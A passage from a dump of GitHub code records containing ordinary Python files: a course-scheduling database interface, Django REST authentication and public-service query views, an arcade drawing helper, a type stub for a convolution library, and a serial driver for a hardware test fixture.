{int} pid - the program id where the program chairs are added to\n'''\n\n\ndef addProgramChairs(users, pid):\n for user in users:\n ProgramChair(username=user, pid=pid).save()\n\n'''\ncreates division\n@param {string} name\n'''\n\n\ndef createDivision(name):\n division = Division(name=name)\n division.save()\n return(division.name, division.dID)\n\n'''creates program\n@param {string} name\n@param {int} divisionID\n\n@returns string, int\n'''\n\n\ndef createProgram(name, divisionID):\n program = Program(name=name, division=divisionID)\n program.save()\n return(program.name, program.pID)\n\n\n'''\ngets elements for the course sidebar\n@returns selectQuery\n'''\n\n\ndef getSidebarElements():\n\n return prefetch(Division.select(), Program, Subject)\n\n\n\n''' gets the instructors belonging to a course\n@param {list} courses - list of courses\n\n@returns{dict} dictionary of courses keys and instructor values\n'''\n\n\ndef createInstructorDict(courses):\n instructors = {}\n try:\n for course in courses:\n if \"SpecialTopicCourse\" in str(type(course)) :\n instructors[course.stId] = InstructorSTCourse.select().where(\n InstructorSTCourse.course == course.stId)\n else:\n instructors[course.cId] = InstructorCourse.select().where(\n InstructorCourse.course == course.cId)\n except:\n for course in courses:\n instructors[course.cId] = InstructorCourse.select().where(\n InstructorCourse.course == course.cId)\n return instructors\n\n'''\ngets all of the buildings\n@returns query object of the buildings\n'''\n\n\ndef getAllBuildings():\n return Building.select().order_by(Building.name)\n\n'''\ngets all the rooms that belong to a building\n'''\n\n\ndef getRoomsByBuilding(building):\n return Rooms.select().where(Rooms.building == building.building)\n\n'''\ngets all terms\nreturn terms\n'''\n\n\ndef getAllTerms():\n return Term.select().order_by(-Term.termCode)\n\ndef isTermOpen(termID):\n ''' returns booleans stating whether the term is open for editing/adding a course'''\n if (Term.get(Term.termCode == int(termID)).term_state == 1):\n return True\n else:\n return False\n\n\ndef isTermLocked(termID):\n ''' returns booleans stating whether the term is locked'''\n if (Term.get(Term.termCode == int(termID)).state == 2):\n return True\n else:\n return False\n\ndef isTermTracking(termID):\n ''' returns booleans stating whether the term is locked'''\n if (Term.get(Term.termCode == int(termID)).state == 1):\n return True\n else:\n return False\n\n\n\ndef editInstructors(newInstructors, courseID):\n ''' edits the instructs give a list of the new instructors\n @param {list} newInstructors - list of new instructors\n @param {int} courseID\n '''\n\n oldInstructors = InstructorCourse.select().where(InstructorCourse.course == courseID)\n for oldInstructor in oldInstructors:\n if oldInstructor.username.username not in newInstructors:\n oldInstructor.delete_instance()\n else:\n newInstructors.remove(oldInstructor.username.username)\n for instructor in newInstructors:\n newInstructor = InstructorCourse(username=instructor, course=courseID)\n newInstructor.save()\n\ndef editSTInstructors(newInstructors, courseID):\n ''' edits the instructs give a list of the new instructors\n @param {list} newInstructors - list of new instructors\n @param {int} courseID\n '''\n oldInstructors = InstructorSTCourse.select().where(\n InstructorSTCourse.course == courseID)\n for oldInstructor in oldInstructors:\n if oldInstructor.username.username not in newInstructors:\n oldInstructor.delete_instance()\n else:\n newInstructors.remove(oldInstructor.username.username)\n for instructor in newInstructors:\n newInstructor = InstructorSTCourse(\n username=instructor, course=courseID)\n newInstructor.save()\n\n\ndef editCourse(data, prefix, professors, crosslistedCourses):\n '''THIS FUNCTION EDITS THE COURSE DATA TABLE'''\n # check to see if the user has privileges to edit\n # get the course object\n #TODO: We are not doing null checks on the portion of\n #the code which is causing crashes on the system\n au = AuthorizedUser()\n course = Course.get(Course.cId == int(data['cid']))\n print(\"course\",course.faculty_credit)\n #CHECK VALUES FOR NULL\n room = data[\"room\"] if data[\"room\"] else None\n capacity = data['capacity'] if data['capacity'] else None\n schedule = data['schedule'] if data['schedule'] else None\n section = data['section'] if data['section'] else None\n faculty_credit= data['faculty_credit'] if data['faculty_credit'] else \"1\"\n\n if data['notes'].replace(\" \", \"\") == \"\":\n notes = None\n else:\n notes = data['notes']\n\n course.crossListed = int(data[\"crossListed\"])\n course.term = data['term']\n course.capacity = capacity\n course.section = section\n course.rid = room\n course.schedule = schedule\n course.notes = notes\n course.lastEditBy = au.username\n course.faculty_credit = faculty_credit\n course.offCampusFlag = bool(data.get('offCampusFlag', False))\n course.save()\n new_instruc = professors[:]\n editInstructors(professors, data['cid'])\n editCrosslistedCourse(course, crosslistedCourses, new_instruc)\n\ndef editCrosslistedCourse(parent, newCourses, newInstructors):\n\n '''\n\n\n '''\n newCourses = map(int, newCourses)\n #find courses where parent is equal to course.cId\n oldChildCourses = Course.select().where(Course.parentCourse == parent.cId)\n\n #if course has crosslisted children or newCrosslist course has been selested\n if oldChildCourses.exists() or newCourses:\n for oldCourse in oldChildCourses:\n\n #update it with parent data it if newCourse still contains oldcourse\n if oldCourse.bannerRef.reFID in newCourses:\n updateChildCourse(oldCourse, parent, newInstructors)\n #remove this course from current newCourses list after updating\n newCourses = filter(lambda a: a != oldCourse.bannerRef.reFID, newCourses)\n else:\n #childCrosslistcourse has been removed, so delete it from database\n rm = RoomPreferences()\n deleteChildCourse(oldCourse, rm)\n\n #add remaing courses as new crosslisted child course to parent course\n if newCourses:\n for newCourse in newCourses:\n #create a new childCrosslisted course for parent\n createChildCourse(newCourse, parent, newInstructors)\n\n\ndef getCourseTimelineSchedules(day,tid):\n schedules = ScheduleDays.select(ScheduleDays.schedule\n ).join(Course, on=(Course.schedule == ScheduleDays.schedule)\n ).join(BannerSchedule, on=(BannerSchedule.sid == ScheduleDays.schedule)\n ).where(ScheduleDays.day == day\n ).where(Course.term == tid\n ).distinct(\n ).order_by(BannerSchedule.startTime)\n return schedules\n\n\ndef editSTCourse(data, prefix, professors, status, cfg):\n '''THIS FUNCTION EDITS THE COURSE DATA TABLE'''\n # check to see if the user has privileges to edit\n # get the specialTopicCourse object\n #TODO: We are not doing null checks on the portion of\n #the code which is causing crashes on the system\n specialTopicCourse = SpecialTopicCourse.get(SpecialTopicCourse.stId == int(data['stid']))\n #import pdb; pdb.set_trace()\n\n au = AuthorizedUser()\n #CHECK VALUES FOR NULL\n room = data[\"room\"] if data[\"room\"] else None\n capacity = data['capacity'] if data['capacity'] else None\n schedule = data['schedule'] if data['schedule'] else None\n section = data['section'] if data['section'] else None\n faculty_credit= data['faculty_credit'] if data[\"faculty_credit\"] else \"1\"\n\n if data['notes'].replace(\" \", \"\") == \"\":\n notes = None\n else:\n notes = data['notes']\n\n\n specialTopicCourse.status = status\n if status in cfg['specialTopicLogic']['approved']:\n bannercourses = BannerCourses(subject = specialTopicCourse.prefix,\n number = specialTopicCourse.bannerRef.number,\n ctitle = specialTopicCourse.specialTopicName,\n is_active = 1)\n bannercourses.save()\n course = Course(bannerRef = bannercourses,\n prefix = specialTopicCourse.prefix,\n term = specialTopicCourse.term,\n schedule = specialTopicCourse.schedule,\n capacity = specialTopicCourse.capacity,\n section = specialTopicCourse.section,\n specialTopicName = specialTopicCourse.specialTopicName,\n notes = specialTopicCourse.notes,\n crossListed = specialTopicCourse.crossListed,\n rid = specialTopicCourse.rid,\n faculty_credit = specialTopicCourse.faculty_credit,\n offCampusFlag = specialTopicCourse.offCampusFlag\n )\n course.save()\n update_course = DataUpdate()\n addCourseInstructors(professors, course.cId)\n if isTermTracking(specialTopicCourse.term.termCode):\n update_course.addCourseChange(int(course.cId), \"create\")\n specialTopicCourse.status = status\n specialTopicCourse.crossListed = int(data[\"crossListed\"])\n specialTopicCourse.capacity = capacity\n specialTopicCourse.rid = room\n specialTopicCourse.schedule = schedule\n specialTopicCourse.notes = notes\n specialTopicCourse.section = section\n specialTopicCourse.lastEditBy = au.username\n specialTopicCourse.credits = data['credits']\n specialTopicCourse.description = data['description']\n specialTopicCourse.prereqs = data['prereqs']\n specialTopicCourse.majorReqsMet = data['majorReqsMet']\n specialTopicCourse.minorReqsMet = data['minorReqsMet']\n specialTopicCourse.concentrationReqsMet = data['concentrationReqsMet']\n specialTopicCourse.perspectivesMet = data['perspectivesMet']\n specialTopicCourse.faculty_credit= data[\"faculty_credit\"]\n specialTopicCourse.offCampusFlag = bool(data.get('offCampusFlag', False))\n\n editSTInstructors(professors, data['stid'])\n specialTopicCourse.save()\n\ndef addInstructorsChild(instructors, parentId, cid):\n '''\n add parent course instructors to childCourses when editing parent course\n\n '''\n parentInstructors = InstructorCourse.select().where(InstructorCourse.course == parentId)\n childInstructors = InstructorCourse.select().where(InstructorCourse.course == cid)\n present = False\n for parentInstructor in parentInstructors:\n for childInstructor in childInstructors:\n if(childInstructor.username.username) == parentInstructor.username.username:\n present = True\n if present == False:\n #clone parent instructor to child\n InstructorCourse(username = parentInstructor.username.username, course = cid).save()\n present = False\n #delete entries that is present in child but not parent\n\n exists = False\n for childInstructor in childInstructors:\n for parentInstructor in parentInstructors:\n if(childInstructor.username.username) == parentInstructor.username.username:\n exists = True\n if exists == False:\n #remove the child instructor\n childInstructor.delete_instance()\n exists = False\n\n\ndef createChildCourse(course_id, parent, newInstructors):\n '''\n create a crosslisted child course for a parent course\n Functionalities:\n a. Creates a child course in Course table\n b. Creates an entry in Crosslisted table to maintain its verified relationship with parent\n c. Create entries in InstructorCourse table so child course instructors same as parent\n d. if parent has roomPreference entry, clone it for child\n '''\n qs = CrossListed.select().where((CrossListed.courseId == parent.cId) & (CrossListed.crosslistedCourse == parent.cId))\n #if uncrosslisted course has selected a crosslist course\n if not qs.exists():\n crosslisted = CrossListed(\n courseId = parent.cId,\n crosslistedCourse= parent.cId,\n prefix= parent.prefix,\n verified = True,\n term= parent.term\n ).save()\n\n course_prefix=BannerCourses.get(BannerCourses.reFID == int(course_id)).subject_id\n\n #create a child course\n cc_course = Course.create(bannerRef=course_id,\n prefix = course_prefix,\n term = parent.term,\n schedule = parent.schedule,\n capacity = parent.capacity,\n specialTopicName = parent.specialTopicName,\n notes = parent.notes,\n crossListed = parent.crossListed,\n parentCourse = parent.cId,\n section = parent.section,\n prereq = parent.prereq,\n offCampusFlag = parent.offCampusFlag\n )\n #TODO:create its instructors\n addInstructorsChild(newInstructors, parent.cId, cc_course.cId)\n\n #create its crosslisted relationship entry with parent\n crosslisted = CrossListed(\n courseId = parent.cId,\n crosslistedCourse= cc_course.cId,\n prefix= course_prefix,\n verified = False,\n term= parent.term\n ).save()\n\n #create its roomPreference if parent has any\n\ndef deleteChildCourse(childCourse, roompreference):\n '''\n deletes crosslisted course from parent\n deletes course itself, Crosslisted relationship, instructors, roompreference entry if any\n '''\n #delete its crosslisted relationship with parent\n q = CrossListed.select().where(\n (CrossListed.crosslistedCourse == childCourse.cId) &\n (CrossListed.courseId == childCourse.parentCourse)\n )\n\n q.first().delete_instance()\n\n #delete the course itself\n childCourse.delete_instance()\n\n #delete course instructors\n instructors = InstructorCourse.select().where(InstructorCourse.course == childCourse.cId)\n for instructor in instructors:\n instructor.delete_instance()\n\n #delete course roompreference if any; check if it has a term so we where with AND\n roompreference.delete_room_preference(childCourse.cId)\n\ndef updateChildCourse(course, parent, newInstructors):\n '''\n updates crosslisted child course when edit has been made to its parent\n\n '''\n #update general course data with parent data\n course.term = parent.term\n course.schedule = parent.schedule\n course.capacity = parent.capacity\n course.specialTopicName = parent.specialTopicName\n course.notes = parent.notes\n course.crossListed = parent.crossListed\n course.parentCourse = parent.cId\n course.section = parent.section\n course.prereq = parent.prereq\n course.offCampusFlag = parent.offCampusFlag\n course.save()\n\n #update its instructors\n addInstructorsChild(newInstructors, parent.cId, course.cId)\n","repo_name":"BCStudentSoftwareDevTeam/cas","sub_path":"app/logic/databaseInterface.py","file_name":"databaseInterface.py","file_ext":"py","file_size_in_byte":16938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4562434638","text":"from http import HTTPStatus\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import authentication_classes, permission_classes\nfrom rest_framework.authtoken.models import Token\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom authentication.serializers import CreateUserSerializer, UserProfileSerializer\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework import status\n\n@api_view(['POST'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsAuthenticated])\ndef logout_view(request):\n \"\"\"\n Log out users\n \"\"\"\n token = Token.objects.get(user=request.user)\n key = token.key\n token.delete()\n return Response(data={\"token\": key}, status=HTTPStatus.ACCEPTED)\n\n\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsAuthenticated])\ndef allusers_view(request):\n \"\"\"\n Fetch all users\n \"\"\"\n if request.user.is_superuser:\n users = User.objects.all().values(\"id\", \"username\", \"is_staff\", \"is_superuser\", \"email\")\n return Response(data=users, status=HTTPStatus.ACCEPTED)\n \n else:\n return Response(status=HTTPStatus.FORBIDDEN)\n\n\nclass ProfileApiView(APIView):\n authentication_classes = [TokenAuthentication]\n permission_classes = [IsAuthenticated]\n serializer_class = UserProfileSerializer\n\n def get(self, request):\n user = User.objects.filter(id=request.user.id).values(\"username\", \"first_name\", \"last_name\", \"email\", \"date_joined\").first()\n return Response(data=user, status=200)\n\n def clean_userdata(self):\n del self.profile_user['id']\n del self.profile_user['password']\n del self.profile_user['is_superuser']\n del self.profile_user['is_active']\n del self.profile_user['is_staff']\n del self.profile_user['groups']\n del self.profile_user['user_permissions']\n\n\n def post(self, request):\n self.profile_user = request.user\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid(raise_exception=True):\n self.profile_user.username = serializer.data['username']\n self.profile_user.first_name = serializer.data['first_name']\n self.profile_user.last_name = serializer.data['last_name']\n self.profile_user.email = serializer.data['email']\n self.profile_user.save()\n \n # Change user model to dict object (desrialize)\n self.profile_user = model_to_dict(self.profile_user)\n\n # Clean user sensitive data\n self.clean_userdata()\n\n return Response(data=self.profile_user, status=200)\n else:\n return Response(data={\"error\": \"Wrong Input, Please try again\"}, status=400)\n\n\n\nclass CreateUserApiView(APIView):\n\n authentication_classes = []\n permission_classes = []\n serializer_class = CreateUserSerializer\n\n def clean_userdata(self):\n del self.profile_user['id']\n del self.profile_user['password']\n del self.profile_user['is_superuser']\n del self.profile_user['is_active']\n del self.profile_user['is_staff']\n del self.profile_user['groups']\n del self.profile_user['user_permissions']\n\n\n def post(self, request):\n try:\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid(raise_exception=True):\n self.profile_user = User(\n email = serializer.data['email'],\n username = serializer.data['username'],\n first_name = serializer.data['first_name'],\n last_name = serializer.data['last_name'],\n )\n\n self.profile_user.set_password(serializer.data['password'])\n self.profile_user.save()\n \n # Change user model to dict object (desrialize)\n self.profile_user = model_to_dict(self.profile_user)\n\n # Clean user sensitive data\n self.clean_userdata()\n\n return Response(data=self.profile_user, status=200)\n \n except BaseException as e:\n return Response(\n {\n \"success\": False, \n \"error\": f\"Error: {e}\"\n }, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"TSD-Planning-Poker/Backend","sub_path":"authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"7555471212","text":"from arcade import Shape, color\nimport arcade\nfrom trainfinity2.constants import (\n CARGO_SIZE,\n)\nfrom trainfinity2.model import CargoType\n\nFILL_COLOR_FROM_CARGO_TYPE = {\n CargoType.IRON: color.TROLLEY_GREY,\n CargoType.COAL: color.SMOKY_BLACK,\n CargoType.STEEL: color.STEEL_BLUE,\n}\n\n\ndef get_cargo_shape(\n x: float, y: float, cargo_type: CargoType, tilt_angle: float = 0\n) -> list[Shape]:\n filled_rectangle = arcade.create_rectangle_filled(\n x,\n y,\n CARGO_SIZE,\n CARGO_SIZE,\n color=FILL_COLOR_FROM_CARGO_TYPE[cargo_type],\n tilt_angle=tilt_angle,\n )\n rectangle_outline = arcade.create_rectangle_outline(\n x, y, CARGO_SIZE, CARGO_SIZE, color=color.BLACK, tilt_angle=tilt_angle\n )\n return [filled_rectangle, rectangle_outline]\n","repo_name":"Godsmith/trainfinity2","sub_path":"trainfinity2/graphics/cargo.py","file_name":"cargo.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"73993517884","text":"from typing import overload, Any, Callable, Dict, List, Optional, Set, Tuple, Type, Union\nfrom pccm.stubs import EnumValue, EnumClassValue\nfrom ...cumm.gemm.main import GemmAlgoDesp\nfrom cumm.tensorview import Tensor\nfrom cumm.tensorview import CUDAKernelTimer\nclass ConvAlgoDesp(GemmAlgoDesp):\n ndim: int\n op_type: int\n iter_algo: int\n layout_i: int\n layout_w: int\n layout_o: int\n interleave_i: int\n interleave_w: int\n interleave_o: int\n mask_sparse: bool\n increment_k_first: bool\n def __init__(self, ndim: int, op_type: int) -> None: \n \"\"\"\n Args:\n ndim: \n op_type: \n \"\"\"\n ...\n def __repr__(self) -> str: ...\n @staticmethod\n def conv_iwo_012_to_abc(op_type: int) -> List[int]: \n \"\"\"\n Args:\n op_type: \n \"\"\"\n ...\n @staticmethod\n def gemm_abc_012_to_iwo(op_type: int) -> List[int]: \n \"\"\"\n Args:\n op_type: \n \"\"\"\n ...\n @property\n def dtype_input(self) -> int: ...\n @property\n def dtype_weight(self) -> int: ...\n @property\n def dtype_output(self) -> int: ...\n def supported(self, m: int, n: int, k: int, C: int, K: int, mask_width: int) -> bool: \n \"\"\"\n Args:\n m: \n n: \n k: \n C: \n K: \n mask_width: \n \"\"\"\n ...\n def query_conv_workspace_size(self, m: int, n: int, k: int, split_k_slices: int, kv: int) -> int: \n \"\"\"\n Args:\n m: \n n: \n k: \n split_k_slices: \n kv: \n \"\"\"\n ...\n def supported_ldx_conv(self, ldi: int, ldw: int, ldo: int) -> bool: \n \"\"\"\n Args:\n ldi: \n ldw: \n ldo: \n \"\"\"\n ...\nclass ConvParams:\n conv_algo_desp: Any\n input: Tensor\n weight: Tensor\n output: Tensor\n split_k_slices: int\n padding: List[int]\n stride: List[int]\n dilation: List[int]\n alpha: float\n beta: float\n mask_width: int\n mask_filter: int\n reverse_mask: bool\n verbose: bool\n timer: CUDAKernelTimer\n workspace: Tensor = Tensor()\n mask: Tensor = Tensor()\n mask_argsort: Tensor = Tensor()\n indices: Tensor = Tensor()\n mask_output: Tensor = Tensor()\n stream: int\n def __init__(self, ndim: int, op_type: int, timer: CUDAKernelTimer = CUDAKernelTimer(False)) -> None: \n \"\"\"\n Args:\n ndim: \n op_type: \n timer: \n \"\"\"\n ...\nclass ConvMainUnitTest:\n @staticmethod\n def extract_mnk(op_type: int, N: int, C: int, K: int, kernel_volume: int, in_prod: int, out_prod: int, mask_sparse: bool) -> List[int]: \n \"\"\"\n Args:\n op_type: \n N: \n C: \n K: \n kernel_volume: \n in_prod: \n out_prod: \n mask_sparse: \n \"\"\"\n ...\n @staticmethod\n def implicit_gemm2(params: ConvParams) -> None: \n \"\"\"\n Args:\n params: \n \"\"\"\n ...\n @staticmethod\n def get_all_conv_algo_desp() -> List[ConvAlgoDesp]: ...\n","repo_name":"dvlab-research/spconv-plus","sub_path":"spconv/core_cc/cumm/conv/main.pyi","file_name":"main.pyi","file_ext":"pyi","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"41"} +{"seq_id":"1519808008","text":"import sys\nimport queue\nimport time\nimport serial\nfrom .simple_hdlc import HDLC\n\nACK = 0x01\nNACK = 0x02\nPING = 0x0A\nGPIO_GET = 0x0B\nMODE = 0x0C\nCOMM = 0x0D\nGPIO_SET = 0x0E\nUART_RX = 0x5A\nUART_TX = 0x6A\nUART_PWR = 0x6B\nI2C_TX = 0x7A\nI2C_RX = 0x7B\nSPI_XFER = 0x8A\nSET_PWM = 0x9A\nGET_TACH = 0xAA\nREPROG = 0xBB\n\nCMD_NAMES = {0x01: \"ACK\", 0x02: \"NACK\", 0x0A: \"PING\", 0x0B: \"GPIO_GET\", \\\n 0x0C: \"MODE\", 0x0D: \"COMM\", 0x0E: \"GPIO_SET\", \\\n 0x5A: \"UART_RX\", 0x6A: \"UART_TX\", 0x6B: \"UART_PWR\", \\\n 0x7A: \"I2C_TX\", 0x7B: \"I2C_RX\", 0x8A: \"SPI_XFER\", 0x9A: \"SET_PWM\", 0xAA: \"GET_TACH\",\n 0xBB: \"REPROG\" }\n\nINPUT = 0\nOUTPUT = 1\n\nHIGH = 1\nLOW = 0\n\ndef _decode_bytes(inbytes):\n line = \"\"\n for b in inbytes:\n line += chr(b)\n return line.replace(\"\\r\\n\", \"\")\n\nclass LagerFixture:\n def __init__(self, serial_port=None, debug=False, print_uart=False):\n self.debug = debug\n self.print_uart = print_uart\n self.ser_queue = queue.Queue()\n self.uart_queue = [queue.Queue()] * 10\n \n if serial_port is not None:\n self.ser = serial.Serial(serial_port, 9600, timeout=0.1)\n else:\n # Use default serial port if available\n try:\n serial_port = \"/dev/ttyACM0\"\n self.ser = serial.Serial(serial_port, 9600, timeout=0.1)\n except serial.serialutil.SerialException:\n print(\"ERROR: Failed to open connection to Lager Test Fixture. \" \\\n \"Check that fixture is attached and that you're connecting with the correct TTY device path.\")\n sys.exit(1)\n\n self.reset()\n\n def reset(self):\n self.ser.flushInput()\n self.h = HDLC(self.ser, self.debug)\n self.h.startReader(self.got_frame)\n\n def handle_ACK(self, frame):\n if self.debug: print(\"\\tCommand Acknowledged!\")\n\n def handle_NACK(self, frame):\n if self.debug: print(\"\\tCommand Error!\")\n\n def handle_GPIO_GET(self, frame):\n return [b > 0 for b in frame[1:]]\n\n # def handle_UART_RX(self, frame):\n # channel = frame[1]\n # if self.print_uart:\n # print(f\"UART {channel}: {frame[2:].decode('ascii')}\")\n # else:\n # self.uart_queue.put(frame)\n\n def handle_UART_RX(self, frame):\n channel = frame[1]\n if self.print_uart:\n line = _decode_bytes(frame[2:])\n print(f\"UART {channel}: {line}\")\n\n self.uart_queue[channel].put(frame[2:])\n \n def send_cmd(self, cmd, data=None):\n output = bytearray()\n output.append(cmd)\n if data:\n output.extend(data)\n self.h.sendFrame(output)\n\n def send_cmd_resp(self, cmd, data=None, timeout=0.5):\n if self.debug: \n if data != None:\n print(f\"Sending {CMD_NAMES[cmd]}: {' '.join([hex(d) for d in data])}\")\n else:\n print(f\"Sending {CMD_NAMES[cmd]} (No Data)\")\n self.send_cmd(cmd, data)\n \n return self.check_queue()\n\n def check_queue(self, timeout=0.05):\n start = time.time()\n\n while time.time() - start < timeout:\n try:\n frame = self.ser_queue.get(block=True, timeout=0.01)\n if self.debug == True and self.print_uart == False:\n print(f\"\\tReceived {frame}\")\n\n # if frame[0] == UART_RX:\n # self.handle_uart(frame)\n # continue\n\n try:\n func_name = \"handle_\" + CMD_NAMES[frame[0]]\n func = getattr(self, func_name)\n # return func(frame)\n func(frame)\n except (KeyError, AttributeError):\n if self.debug: print(f\"\\tGot frame: {frame}\")\n return frame\n except queue.Empty:\n continue\n\n def got_frame(self, frame):\n self.ser_queue.put(frame)\n\n def _reprog(self):\n self.send_cmd(REPROG)\n\n def ping(self):\n return self.send_cmd_resp(PING)\n\n def set_gpio_mode(self, pin, direction):\n self.send_cmd_resp(MODE, [pin, direction])\n\n def set_gpio(self, pin, level):\n self.send_cmd_resp(GPIO_SET, [pin, level])\n\n def get_gpio(self, pin):\n resp = self.send_cmd_resp(GPIO_GET)\n return resp[pin]\n\n def i2c_tx(self, channel, target, data):\n length = len(data)\n self.send_cmd_resp(I2C_TX, [channel, target, length] + data)\n\n def i2c_rx(self, channel, target, length):\n resp = self.send_cmd_resp(I2C_RX, [channel, target, length])\n return resp\n\n def spi_xfer(self, channel, ss, data):\n length = len(data)\n resp = self.send_cmd_resp(SPI_XFER, [channel, ss, length] + data)\n return resp\n\n def uart_rx(self, channel, timeout=0.1, decode=False):\n self.check_queue(timeout=timeout)\n lines = []\n while True:\n try:\n line = self.uart_queue[channel].get(block=False)\n if decode == True:\n line = line.decode(\"ascii\")\n elif decode:\n line = line.decode(decode)\n lines.append(line)\n except queue.Empty:\n return lines\n\n def uart_tx(self, channel, data):\n length = len(data)\n self.send_cmd_resp(UART_TX, [channel, length] + [ord(c) for c in data])\n\n def uart_pwr(self, channel, state):\n self.send_cmd_resp(UART_PWR, [channel, state])\n\n def set_freq(self, channel, freq, dc):\n freq_h = freq >> 8\n freq_l = freq & 0xFF\n val = (dc * 255) // 100\n self.send_cmd_resp(SET_PWM, [channel, freq_h, freq_l, val])\n\n def get_freq(self, channel):\n resp = self.send_cmd_resp(GET_TACH, [channel])\n if resp == None:\n print(\"No data returned\")\n return None, None\n freq = resp[1] << 8 | resp[2]\n dc = resp[3] << 8 | resp[4]\n dc /= 100\n return freq, dc","repo_name":"lagerdata/lager_fixture","sub_path":"lager_fixture/lager_fixture.py","file_name":"lager_fixture.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"71009538045","text":"import abc\nimport logging as logger\nimport os\n\n# Create your views here.\nimport requests\nfrom rest_framework import filters, permissions\nfrom rest_framework.generics import RetrieveUpdateDestroyAPIView\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom cpsv.cpsv_rdf_call import get_contact_points\nfrom cpsv.models import PublicService, ContactPoint\nfrom cpsv.rdf_call import (\n get_dropdown_options_for_public_services,\n get_dropdown_options_for_contact_points,\n get_contact_point_uris_filter,\n)\nfrom cpsv.rdf_call import get_public_service_uris_filter\nfrom cpsv.serializers import PublicServiceSerializer, ContactPointSerializer\n\nRDF_FUSEKI_URL = os.environ[\"RDF_FUSEKI_URL\"]\nURI_IS_CLASSIFIED_BY = os.environ[\"URI_IS_CLASSIFIED_BY\"]\nURI_HAS_COMPETENT_AUTHORITY = os.environ[\"URI_HAS_COMPETENT_AUTHORITY\"]\nURI_HAS_CONTACT_POINT = os.environ[\"URI_HAS_CONTACT_POINT\"]\n\n\nclass PaginationHandlerMixin(object):\n @property\n def paginator(self):\n if not hasattr(self, \"_paginator\"):\n if self.pagination_class is None:\n self._paginator = None\n else:\n self._paginator = self.pagination_class()\n else:\n pass\n return self._paginator\n\n def paginate_queryset(self, queryset):\n if self.paginator is None:\n return None\n return self.paginator.paginate_queryset(queryset, self.request, view=self)\n\n def get_paginated_response(self, data):\n assert self.paginator is not None\n return self.paginator.get_paginated_response(data)\n\n\nclass SmallResultsSetPagination(LimitOffsetPagination):\n default_limit = 5\n limit_query_param = \"rows\"\n offset_query_param = \"page\"\n\n\nclass RdfContactPointsAPIView(APIView, PaginationHandlerMixin):\n pagination_class = SmallResultsSetPagination\n queryset = ContactPoint.objects.all()\n serializer_class = ContactPointSerializer\n filter_backends = [filters.OrderingFilter]\n ordering_fields = [\"description\"]\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None, *args, **kwargs):\n q = ContactPoint.objects.all()\n keyword = self.request.GET.get(\"keyword\", \"\")\n\n dict_rdf_filters = request.data[\"rdfFilters\"]\n logger.info(\"dict_rdf_filters: %s\", dict_rdf_filters)\n\n rdf_uris = get_contact_point_uris_filter(filter_public_service=dict_rdf_filters.get(URI_HAS_CONTACT_POINT))\n logger.info(\"rdf_uris: %s\", rdf_uris)\n\n if rdf_uris:\n q = q.filter(identifier__in=rdf_uris)\n if keyword:\n q = q.filter(name__icontains=keyword)\n else:\n q = ContactPoint.objects.none()\n\n page = self.paginate_queryset(q)\n\n serializer = self.get_paginated_response(\n self.serializer_class(page, many=True, context={\"request\": request}).data\n )\n\n return Response(serializer.data)\n\n\nclass RdfPublicServicesAPIView(APIView, PaginationHandlerMixin):\n pagination_class = SmallResultsSetPagination\n queryset = PublicService.objects.all()\n serializer_class = PublicServiceSerializer\n filter_backends = [filters.OrderingFilter]\n ordering_fields = [\"name\"]\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None, *args, **kwargs):\n q = PublicService.objects.all()\n keyword = self.request.GET.get(\"keyword\", \"\")\n website = self.request.GET.get(\"website\", \"\")\n\n dict_rdf_filters = request.data[\"rdfFilters\"]\n logger.info(\"dict_rdf_filters: %s\", dict_rdf_filters)\n\n # rdf_results = get_public_services(RDF_FUSEKI_URL)\n # rdf_uris = [str(item[\"uri\"]) for item in rdf_results]\n\n rdf_uris = get_public_service_uris_filter(\n filter_concepts=dict_rdf_filters.get(URI_IS_CLASSIFIED_BY),\n filter_public_organization=dict_rdf_filters.get(URI_HAS_COMPETENT_AUTHORITY),\n filter_contact_point=dict_rdf_filters.get(URI_HAS_CONTACT_POINT),\n )\n logger.info(\"rdf_uris: %s\", rdf_uris)\n\n if rdf_uris:\n q = q.filter(identifier__in=rdf_uris)\n if keyword:\n q = q.filter(name__icontains=keyword)\n if website:\n q = q.filter(website__name__iexact=website)\n\n else:\n q = PublicService.objects.none()\n\n page = self.paginate_queryset(q)\n\n serializer = self.get_paginated_response(\n self.serializer_class(page, many=True, context={\"request\": request}).data\n )\n\n return Response(serializer.data)\n\n\nclass PublicServiceDetailAPIView(RetrieveUpdateDestroyAPIView):\n queryset = PublicService.objects.all()\n serializer_class = PublicServiceSerializer\n\n\nclass ContactPointDetailAPIView(RetrieveUpdateDestroyAPIView):\n queryset = ContactPoint.objects.all()\n serializer_class = ContactPointSerializer\n\n\nclass EntityOptionsAPIView(APIView, abc.ABC):\n queryset = PublicService.objects.none()\n permission_classes = [permissions.IsAuthenticated]\n\n def get(self, request, format=None):\n mock_data = self.get_mock_data()\n\n return Response(mock_data)\n\n @staticmethod\n @abc.abstractmethod\n def get_mock_data():\n pass\n\n\nclass PublicServicesEntityOptionsAPIView(EntityOptionsAPIView):\n @staticmethod\n def get_mock_data():\n mock_data = [\n URI_HAS_CONTACT_POINT,\n 